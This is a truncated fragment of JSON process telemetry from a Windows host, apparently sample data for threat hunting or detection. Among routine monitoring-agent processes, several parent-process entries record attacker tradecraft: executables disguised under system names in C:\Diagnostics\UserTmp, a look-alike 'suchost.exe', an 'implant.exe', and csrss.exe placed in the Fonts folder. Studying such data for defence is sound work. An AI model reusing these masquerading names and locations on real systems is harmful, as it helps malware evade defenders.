State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 